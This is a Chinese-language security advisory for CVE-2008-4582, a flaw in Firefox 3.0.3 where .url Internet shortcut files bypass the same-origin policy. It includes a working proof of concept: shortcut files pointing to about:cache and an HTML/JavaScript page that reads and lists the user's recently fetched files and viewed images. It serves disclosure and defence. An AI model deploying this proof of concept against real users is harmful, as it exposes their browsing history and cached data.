|
||||||||
 |
||||||||
 |
|
|
|||||||||||||||||||
|
||||||||||||||||||||
受影响系统: Mozilla Firefox 3.0.3描述: BUGTRAQ ID: 31611,31747 CVE(CAN) ID: CVE-2008-4582 Firefox是非常流行的开源WEB浏览器。 Firefox在通过HTML单元启动URL快捷方式的时候没有正确地实施同源策略,如果在本地路径或Windows共享(UNC/SMB)路径中打开了网页的话,就可能读取任何位置的内容,包括缓存信息、Cookie、本地文件系统等。 <*来源:Liu Die Yu (liudieyuinchina@yahoo.com.cn) 链接:http://marc.info/?l=bugtraq&m=122339140126357&w=2 http://secunia.com/advisories/32192 http://www.mozilla.org/security/announce/2008/mfsa2008-47.html *> 测试方法: 警 告 [InternetShortcut] URL=about:cache?device=memory IDList= [{000214A0-0000-0000-C000-000000000046}] Prop3=19,2 -----testurl2.url----- [InternetShortcut] URL=about:cache?device=disk IDList= [{000214A0-0000-0000-C000-000000000046}] Prop3=19,2 -----test.html----- <script> function a() { s=""; h=""; for(i=0;i<window.frames.length;i++) { d=window.frames[i].document; for(j=0;j<d.links.length;j++) { u=d.links[j].text s+=u+"\n"; h+="<img src=\""+u+"\">"; } } document.getElementById("t").value=s; document.getElementById("x").innerHTML=h; } </script> <a href="javascript:a();">Start Test</a><br> <a href="javascript:window.location=location.href">Load This Page Again</a><br> <br> <br> <b>List of files that you recently fetched from the internet:</b><br> <textarea rows="10" cols="100" id=t wrap=off></textarea> <br> <br> <b>List of images that you recently viewed on the internet:</b><br> <div id=x></div> <br> <br> <iframe width=300 height=200 src="testurl1.url"></iframe> <iframe width=300 height=200 src="testurl2.url"></iframe> 建议: 厂商补丁: Mozilla ------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.mozilla.org/ |
|
Copyright ◎ 2004 - 2008 红客中国安全网版权所有
|